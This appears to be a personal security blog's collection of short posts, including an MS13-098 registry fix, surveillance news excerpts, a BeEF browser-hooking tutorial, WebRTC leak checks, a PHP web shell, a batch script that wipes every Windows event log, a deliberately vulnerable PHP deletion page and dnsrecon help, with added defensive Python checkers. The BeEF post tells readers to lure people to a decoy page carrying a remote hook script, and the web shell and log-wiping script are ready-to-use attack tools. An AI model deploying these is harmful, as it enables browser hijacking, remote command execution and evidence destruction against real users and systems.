Enable Windows Authenticode signature verification

Microsoft Security Bulletin MS13-098

This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow remote code execution if a user or application runs or installs a specially crafted, signed portable executable (PE) file on an affected system.

This security update is rated Critical for all supported releases of Windows.

The security update addresses the vulnerability by modifying how the WinVerifyTrust function handles Windows Authenticode signature verification for portable executable files. For more information about the vulnerability, see the Frequently Asked Questions (FAQ) subsection for the vulnerability later in this bulletin.

https://technet.microsoft.com/library/security/ms13-098

 

For 32-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note You must restart the system for your changes to take effect.

 

For 64-bit versions of Microsoft Windows

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension (for example, enableAuthenticodeVerification64.reg).

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"
 
[HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Cryptography\Wintrust\Config] 
"EnableCertPaddingCheck"="1"

You can apply this .reg file to individual systems by double-clicking it.

Note You must restart the system for your changes to take effect.

 

Impact of enabling the functionality changes included in the MS13-098 update: non-conforming binaries will appear unsigned and will therefore be treated as untrusted.

https://technet.microsoft.com/library/security/2915720
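What EnableCertPaddingCheck tightens is the handling of the WIN_CERTIFICATE entry that the PE security data directory points at: the entry holds the PKCS#7 SignedData of the Authenticode signature, and verification used to ignore whatever sat between the end of that DER structure and the end of the entry. The Python below is an added example, not Microsoft's code and not the logic of WinVerifyTrust itself; it parses a PE image's security directory and reports whether anything other than zero padding follows the signed data, which is my reading of what the padding check enforces. The PE images and the stand-in PKCS#7 blob it inspects are constructed inside the block.

```python
import struct


def build_sample_pe(extra: bytes = b"") -> bytes:
    """Build a minimal PE32 image for the example (constructed; not a real executable
    and not a real Authenticode signature). `extra` is appended after the stand-in
    PKCS#7 blob inside the WIN_CERTIFICATE entry, which is what the padding check rejects."""
    pkcs7 = bytes.fromhex("300502030A0B0C")        # constructed DER SEQUENCE { INTEGER 0x0A0B0C }
    body = pkcs7 + extra
    body += b"\0" * (-len(body) % 8)              # entries are padded to 8-byte alignment
    # WIN_CERTIFICATE: dwLength, wRevision (0x0200), wCertificateType (PKCS_SIGNED_DATA = 2)
    cert = struct.pack("<IHH", 8 + len(body), 0x0200, 0x0002) + body

    opt = bytearray(224)                          # PE32 optional header with 16 data directories
    struct.pack_into("<H", opt, 0, 0x10B)         # Magic: PE32
    struct.pack_into("<I", opt, 92, 16)           # NumberOfRvaAndSizes
    headers_len = 0x40 + 4 + 20 + len(opt)        # DOS header + "PE\0\0" + COFF + optional header
    # IMAGE_DIRECTORY_ENTRY_SECURITY (index 4) holds a file offset (not an RVA) and a size
    struct.pack_into("<II", opt, 96 + 4 * 8, headers_len, len(cert))

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)       # e_lfanew
    # Machine, NumberOfSections, TimeDateStamp, PtrToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x0102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt) + cert


def _der_total_length(blob: bytes) -> int:
    """Full encoded size (tag + length + content) of the DER element starting at blob[0]."""
    if len(blob) < 2:
        raise ValueError("truncated DER element")
    first = blob[1]
    if first < 0x80:                              # short-form length
        return 2 + first
    n = first & 0x7F                              # long form: n length octets follow
    if n == 0 or len(blob) < 2 + n:
        raise ValueError("unsupported or truncated DER length")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def check_cert_padding(pe: bytes) -> dict:
    """Locate the Authenticode certificate table and classify the bytes that trail
    the PKCS#7 SignedData: only zero alignment padding is accepted as conforming."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    opt = e_lfanew + 4 + 20                       # optional header follows the COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)   # data directory offset: PE32 vs PE32+
    sec_off, sec_size = struct.unpack_from("<II", pe, dir_base + 4 * 8)
    if sec_size == 0:
        return {"status": "unsigned", "signed_data_len": 0, "trailing_nonzero": 0}
    dw_length, revision, cert_type = struct.unpack_from("<IHH", pe, sec_off)
    if dw_length < 8 or dw_length > sec_size:
        raise ValueError("inconsistent WIN_CERTIFICATE length")
    blob = pe[sec_off + 8:sec_off + dw_length]
    signed_len = _der_total_length(blob)
    trailing = blob[signed_len:]
    nonzero = sum(1 for b in trailing if b != 0)
    return {
        "status": "conforming" if nonzero == 0 else "non-conforming",
        "revision": revision,
        "cert_type": cert_type,
        "signed_data_len": signed_len,
        "trailing_nonzero": nonzero,
    }


if __name__ == "__main__":
    print("clean   :", check_cert_padding(build_sample_pe()))
    print("appended:", check_cert_padding(build_sample_pe(b"EXTRA-DATA")))
```

Run the block as a script and it prints one conforming and one non-conforming verdict. Real binaries that carry extra content in that entry are exactly the ones the bulletin says will "appear unsigned" once the registry value is set, so running a check like this over an application estate before enabling it shows which installers or self-updating programs would stop verifying.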

 

Tracking techniques are getting “deeper”…

As people become more aware of possible security risks, the well-known surveillance organizations are finding deeper, lower-level ways of getting access to your data.

With just a few days difference, we are hearing about possible spying firmware on our hard drives and stolen encryption keys for our SIM cards!

Pretty interesting…

 

Russian Researchers Expose Breakthrough U.S. Spying Program | 2015/02/16

(Reuters) – The U.S. National Security Agency has figured out how to hide spying software deep within hard drives made by Western Digital, Seagate, Toshiba and other top manufacturers, giving the agency the means to eavesdrop on the majority of the world’s computers, according to cyber researchers and former operatives.

That long-sought and closely guarded ability was part of a cluster of spying programs discovered by Kaspersky Lab, the Moscow-based security software maker that has exposed a series of Western cyberespionage operations.

Kaspersky said it found personal computers in 30 countries infected with one or more of the spying programs, with the most infections seen in Iran, followed by Russia, Pakistan, Afghanistan, China, Mali, Syria, Yemen and Algeria. The targets included government and military institutions, telecommunication companies, banks, energy companies, nuclear researchers, media, and Islamic activists, Kaspersky said. (reut.rs/1L5knm0)

… [read the whole article here]

 

The Great SIM Heist | 2015/02/19

AMERICAN AND BRITISH spies hacked into the internal computer network of the largest manufacturer of SIM cards in the world, stealing encryption keys used to protect the privacy of cellphone communications across the globe, according to top-secret documents provided to The Intercept by National Security Agency whistleblower Edward Snowden.

The hack was perpetrated by a joint unit consisting of operatives from the NSA and its British counterpart Government Communications Headquarters, or GCHQ. The breach, detailed in a secret 2010 GCHQ document, gave the surveillance agencies the potential to secretly monitor a large portion of the world’s cellular communications, including both voice and data.

The company targeted by the intelligence agencies, Gemalto, is a multinational firm incorporated in the Netherlands that makes the chips used in mobile phones and next-generation credit cards. Among its clients are AT&T, T-Mobile, Verizon, Sprint and some 450 wireless network providers around the world. The company operates in 85 countries and has more than 40 manufacturing facilities. One of its three global headquarters is in Austin, Texas and it has a large factory in Pennsylvania.

In all, Gemalto produces some 2 billion SIM cards a year. Its motto is “Security to be Free.”

… [read the whole article here]

How to use BeEF – Quick Tutorial

BeEF – The Browser Exploitation Framework
BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.

Amid growing concerns about web-borne attacks against clients, including mobile clients, BeEF allows the professional penetration tester to assess the actual security posture of a target environment by using client-side attack vectors. Unlike other security frameworks, BeEF looks past the hardened network perimeter and client system, and examines exploitability within the context of the one open door: the web browser. BeEF will hook one or more web browsers and use them as beachheads for launching directed command modules and further attacks against the system from within the browser context.

Tutorial

1. Start Apache service if not running

service apache2 start

Starting Apache2 Service

2. Navigate to /var/www/ directory and remove any apache default files and folders.

3. Create an empty index.html file

Empty Index File

4. Create a folder and name it, for example, funnypuppies.

5. Download a picture of funny puppies and store it inside the funnypuppies folder.

funny puppies

6. Create an index.html file inside funnypuppies folder.

7. Add the following html code in your index.html file.

Funny Puppies
<script src="http://your.ip.address:3000/hook.js"></script>
<img src="funnypuppies.jpg" alt="" />

Html Code

8. Open BeEF. Go to Applications -> Kali Linux -> Exploitation Tools -> BeEF XSS Framework -> beef

BeEF

9. Your browser will open the address, http://127.0.0.1:3000/ui/authentication. Default BeEF username: beef, and password: beef.

BeEF Panel

10. Now you have to persuade people to open your link, http://your.external.ip.address/funnypuppies.jpg. Whoever visits the link will have their browser appear in BeEF's tree.

BeEF

Enjoy

WebRTC Vulnerability leaks Real IP Address

WebRTC Vulnerability leaks Real IP Address of VPN User.

This security flaw can reveal your real IP address, even if you’re using a VPN, and it’s easy to exploit.

To check if you are safe or not:

> Visit https://diafygi.github.io/webrtc-ips/ while you are connected to your vpn.

> If your real IP address is in the results of the test then your browser is leaking your IP.

To prevent this from happening:

For Chrome Users:
> Install this addon, https://chrome.google.com/webstore/detail/scriptsafe/oiigbmnaadbkfbmpbfijlflahbdbdgdf?hl=en.

For Firefox Users:
> Open about:config
> Locate media.peerconnection.enabled
> Set it to false

To confirm that WebRTC is disabled:

> Visit https://www.browserleaks.com/webrtc
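The test pages above work by creating an RTCPeerConnection and reading the ICE candidates the browser gathers; a candidate carrying an address that is neither your LAN address nor the VPN exit is the leak. The Python below is an added example, not code from either test page: it parses candidate strings in the form the browser's onicecandidate handler delivers them and flags the ones that expose a non-local address other than the VPN exit, so you can interpret a result (or automate the check over candidates exported from a browser) rather than eyeballing it. The candidate lines and addresses are constructed for the example.

```python
import ipaddress
import re

# Constructed ICE candidate strings in the shape RTCPeerConnection.onicecandidate
# delivers them (addresses are documentation/test ranges, invented for the example).
SAMPLE_CANDIDATES = [
    "candidate:1 1 udp 2122260223 192.168.1.23 54321 typ host generation 0",
    "candidate:2 1 udp 1686052607 203.0.113.45 54321 typ srflx raddr 192.168.1.23 rport 54321 generation 0",
    "candidate:3 1 udp 2122194687 10.8.0.6 61000 typ host generation 0",
]

# Addresses that only describe the local machine or LAN; everything else is "public" here.
_LOCAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "fc00::/7", "fe80::/10", "::1/128",
)]

# candidate:<foundation> <component> <transport> <priority> <address> <port> typ <type> ...
_ADDR_RE = re.compile(r"^candidate:\S+ \d+ \S+ \d+ (\S+) \d+ typ (\S+)")


def _is_local(ip) -> bool:
    return any(ip in net for net in _LOCAL_NETS)


def extract_addresses(candidates):
    """Return (ip, candidate_type) for every candidate that carries an IP literal.
    mDNS-obfuscated host candidates (uuid.local) carry no address and are skipped."""
    found = []
    for line in candidates:
        m = _ADDR_RE.match(line)
        if not m:
            continue
        try:
            ip = ipaddress.ip_address(m.group(1))
        except ValueError:
            continue
        found.append((ip, m.group(2)))
    return found


def find_leaks(candidates, vpn_exit_ip):
    """Non-local addresses other than the VPN exit are the real-IP leaks."""
    vpn = ipaddress.ip_address(vpn_exit_ip)
    return [(str(ip), ctype) for ip, ctype in extract_addresses(candidates)
            if not _is_local(ip) and ip != vpn]


if __name__ == "__main__":
    # 198.51.100.7 is a constructed VPN exit address for the example.
    print(find_leaks(SAMPLE_CANDIDATES, "198.51.100.7"))
```

A server-reflexive (srflx) candidate with an address that is not the VPN exit means the STUN request left through an interface the VPN did not cover; host candidates only reveal LAN addresses, which is the lesser of the two exposures. After the Firefox or Chrome change above, the candidate list is empty and the function returns nothing.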

How the NSA is tracking people

http://apps.washingtonpost.com/g/page/national/how-the-nsa-is-tracking-people-right-now/634/?tid=sm_fb

Create a Java Certificate

keytool.exe -genkey -keyalg algorithm -alias my_alias -keystore myfilename.jks -storepass my_password -validity my_days -keysize my_size
Options:
 -alias <alias>                  alias name of the entry to process
 -keyalg <keyalg>                key algorithm name
 -keysize <keysize>              key bit size
 -sigalg <sigalg>                signature algorithm name
 -destalias <destalias>          destination alias
 -dname <dname>                  distinguished name
 -startdate <startdate>          certificate validity start date/time
 -ext <value>                    X.509 extension
 -validity <valDays>             validity number of days
 -keypass <arg>                  key password
 -keystore <keystore>            keystore name
 -storepass <arg>                keystore password
 -storetype <storetype>          keystore type
 -providername <providername>    provider name
 -providerclass <providerclass>  provider class name
 -providerarg <arg>              provider argument
 -providerpath <pathlist>        provider classpath
 -v                              verbose output
 -protected                      password through protected mechanism

Example:

keytool.exe -genkey -keyalg RSA -alias myjavacert -keystore mykeystore.jks -storepass 123456qwerty -validity 365 -keysize 2048

A quick and dirty php web shell

<?php
if(isset($_REQUEST['cmd'])){
	echo "Command: <span style='color:red;'><b>".$_REQUEST['cmd']."</b></span> executed.";
	echo "<pre style='border:solid 3px red;background:black;color:white;padding:10px;font-size:14px;'>";
	$cmd = ($_REQUEST['cmd']);
	system($cmd);
	echo "</pre>";
	die;
}

Clear All Windows Logs

1) Create a .bat file
2) Append the following:

@echo off
FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
IF (%adminTest%)==(Access) goto noAdmin
for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
echo.
echo Event Logs have been cleared! ^<press any key^>
goto theEnd
:do_clear
echo clearing %1
wevtutil.exe cl %1
goto :eof
:noAdmin
echo You must run this script as an Administrator!
echo ^<press any key^>
:theEnd
pause>NUL

3) Run as administrator
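Clearing every channel with wevtutil cl leaves its own trace: the Security log records Event ID 1102 ("The audit log was cleared") and the System log records Event ID 104 for each other log that was cleared, both from the Microsoft-Windows-Eventlog provider, and a copy forwarded to a collector survives the local wipe. The Python below is an added detection example, not part of the original post, run over event records constructed in the block in the shape a log forwarder would hand to a SIEM; a burst of clears within a short window, which is what the script above produces, is escalated to a bulk alert.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed event records (hosts, users and times are invented for this example).
SAMPLE_EVENTS = [
    {"time": "2015-03-01T09:58:00", "host": "WS01", "channel": "Security",
     "provider": "Microsoft-Windows-Security-Auditing", "id": 4624, "user": "WS01\\alice"},
    {"time": "2015-03-01T10:00:01", "host": "WS01", "channel": "Security",
     "provider": "Microsoft-Windows-Eventlog", "id": 1102, "user": "WS01\\alice"},
    {"time": "2015-03-01T10:00:01", "host": "WS01", "channel": "System",
     "provider": "Microsoft-Windows-Eventlog", "id": 104, "user": "WS01\\alice",
     "cleared": "Application"},
    {"time": "2015-03-01T10:00:02", "host": "WS01", "channel": "System",
     "provider": "Microsoft-Windows-Eventlog", "id": 104, "user": "WS01\\alice",
     "cleared": "System"},
    {"time": "2015-03-01T10:00:02", "host": "WS01", "channel": "System",
     "provider": "Microsoft-Windows-Eventlog", "id": 104, "user": "WS01\\alice",
     "cleared": "Microsoft-Windows-PowerShell/Operational"},
    {"time": "2015-03-01T15:30:00", "host": "WS02", "channel": "System",
     "provider": "Microsoft-Windows-Eventlog", "id": 104, "user": "WS02\\bob",
     "cleared": "Application"},
]

# (channel, event id) pairs written by the Eventlog service when a log is cleared
CLEAR_EVENTS = {("Security", 1102), ("System", 104)}


def is_log_clear(ev) -> bool:
    return ev["provider"] == "Microsoft-Windows-Eventlog" and (ev["channel"], ev["id"]) in CLEAR_EVENTS


def detect_log_clearing(events, window=timedelta(seconds=60), bulk_threshold=3):
    """One alert per host that cleared any log; 'bulk' when at least bulk_threshold
    clears fall inside a single window, 'single' otherwise."""
    per_host = defaultdict(list)
    for ev in events:
        if is_log_clear(ev):
            per_host[ev["host"]].append(ev)
    alerts = []
    for host, evs in per_host.items():
        times = sorted(datetime.fromisoformat(e["time"]) for e in evs)
        # densest run of clears that fits inside one window
        densest = max(sum(1 for t in times[i:] if t - t0 <= window) for i, t0 in enumerate(times))
        alerts.append({
            "host": host,
            "severity": "bulk" if densest >= bulk_threshold else "single",
            "count": len(evs),
            "users": sorted({e["user"] for e in evs}),
            "cleared": sorted({e.get("cleared", e["channel"]) for e in evs}),
        })
    return sorted(alerts, key=lambda a: a["host"])


if __name__ == "__main__":
    for alert in detect_log_clearing(SAMPLE_EVENTS):
        print(alert)
```

The 1102 record names the account that performed the clear, so even a single one is worth an alert on a server; the bulk rule exists because legitimate administrators rarely clear dozens of channels in the same second.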

PHP Command Injection Vulnerability in Web applications

Create a new PHP file, name it test_command_injection.php, and save it inside Apache’s htdocs directory:

<?php
if(isset($_GET['filename']))
{
	$filename = $_GET['filename'];
	if(file_exists($filename))
	{
		unlink($filename);
	}
}

Open your favorite browser and open the URL: http://localhost/test_command_injection.php?filename=path_to_file_4_deletion

As you can see, you could delete any file in the system if you provide the right path.
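The defect is that the handler passes a client-supplied path straight to unlink: "../" segments and absolute paths are honored, so the script deletes whatever the web server account may delete. The Python below is an added example (not the page's PHP and not a library API) that puts the same vulnerable logic beside a hardened version: the fix resolves the requested name under a fixed base directory with realpath, which collapses both ".." and symlinks, and refuses anything that lands outside it. The demo() function exercises both handlers against a temporary directory tree it creates itself.

```python
import os
import tempfile


def vulnerable_delete(filename: str) -> bool:
    """Same logic as the PHP handler: whatever path the client names is removed."""
    if os.path.exists(filename):
        os.unlink(filename)
        return True
    return False


def safe_delete(base_dir: str, filename: str) -> bool:
    """Delete only regular files that resolve inside base_dir once '..' and symlinks
    are collapsed. An absolute `filename` makes os.path.join discard base_dir, which the
    containment check below then catches."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, filename))
    if target == base or os.path.commonpath([base, target]) != base:
        raise PermissionError(f"refusing to delete outside {base_dir}: {filename!r}")
    if not os.path.isfile(target):
        return False
    os.unlink(target)
    return True


def demo() -> dict:
    """Run both handlers against a throwaway tree (uploads/ plus two files beside it)."""
    with tempfile.TemporaryDirectory() as root:
        uploads = os.path.join(root, "uploads")
        os.mkdir(uploads)
        for name in ("config.ini", "config2.ini"):
            open(os.path.join(root, name), "w").close()
        open(os.path.join(uploads, "report.txt"), "w").close()

        try:                                                   # relative traversal
            safe_delete(uploads, "../config.ini")
            traversal_blocked = False
        except PermissionError:
            traversal_blocked = True
        try:                                                   # absolute path
            safe_delete(uploads, os.path.join(root, "config.ini"))
            absolute_blocked = False
        except PermissionError:
            absolute_blocked = True
        inside = safe_delete(uploads, "report.txt")            # legitimate request
        outside = vulnerable_delete(os.path.join(uploads, "..", "config2.ini"))

        return {
            "traversal_blocked": traversal_blocked,
            "absolute_blocked": absolute_blocked,
            "config_survives": os.path.exists(os.path.join(root, "config.ini")),
            "inside_deleted": inside and not os.path.exists(os.path.join(uploads, "report.txt")),
            "vulnerable_deleted_outside": outside and not os.path.exists(os.path.join(root, "config2.ini")),
        }


if __name__ == "__main__":
    print(demo())
```

Running the web server under an account that can only delete within the upload directory is the second layer; the path check is what stops the request from ever reaching the file system outside it.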

Dnsrecon – Kali Linux

Open a terminal in your Kali Linux distribution.

Enumerate a domain

dnsrecon -d example.com

Test all NS servers in a domain for misconfigured zone transfers

dnsrecon -d example.com -t axfr

Help!

Version: 0.8.8
Usage: dnsrecon.py <options>
 
Options:
   -h, --help                  Show this help message and exit
   -d, --domain      <domain>  Domain to Target for enumeration.
   -r, --range       <range>   IP Range for reverse look-up brute force in formats (first-last)
                               or in (range/bitmask).
   -n, --name_server <name>    Domain server to use, if none is given the SOA of the
                               target will be used
   -D, --dictionary  <file>    Dictionary file of sub-domain and hostnames to use for
                               brute force.
   -f                          Filter out of Brute Force Domain lookup records that resolve to
                               the wildcard defined IP Address when saving records.
   -t, --type        <types>   Specify the type of enumeration to perform:
                               std      To Enumerate general record types, enumerates.
                                        SOA, NS, A, AAAA, MX and SRV if AXRF on the
                                        NS Servers fail.
 
                               rvl      To Reverse Look Up a given CIDR IP range.
 
                               brt      To Brute force Domains and Hosts using a given
                                        dictionary.
 
                               srv      To Enumerate common SRV Records for a given 
 
                                        domain.
 
                               axfr     Test all NS Servers in a domain for misconfigured
                                        zone transfers.
 
                               goo      Perform Google search for sub-domains and hosts.
 
                               snoop    To Perform a Cache Snooping against all NS 
                                        servers for a given domain, testing all with
                                        file containing the domains, file given with -D
                                        option.
 
                               tld      Will remove the TLD of given domain and test against
                                        all TLD's registered in IANA
 
                               zonewalk Will perform a DNSSEC Zone Walk using NSEC Records.
 
   -a                          Perform AXFR with the standard enumeration.
   -s                          Perform Reverse Look-up of ipv4 ranges in the SPF Record of the
                               targeted domain with the standard enumeration.
   -g                          Perform Google enumeration with the standard enumeration.
   -w                          Do deep whois record analysis and reverse look-up of IP
                               ranges found thru whois when doing standard query.
   -z                          Performs a DNSSEC Zone Walk with the standard enumeration.
   --threads          <number> Number of threads to use in Range Reverse Look-up, Forward
                               Look-up Brute force and SRV Record Enumeration
   --lifetime         <number> Time to wait for a server to response to a query.
   --db               <file>   SQLite 3 file to save found records.
   --xml              <file>   XML File to save found records.
   --iw                        Continua bruteforcing a domain even if a wildcard record resolution is 
                               discovered.
   -c, --csv          <file>   Comma separated value file.
   -j, --json         <file>   JSON file.
   -v                          Show attempts in the bruteforce modes.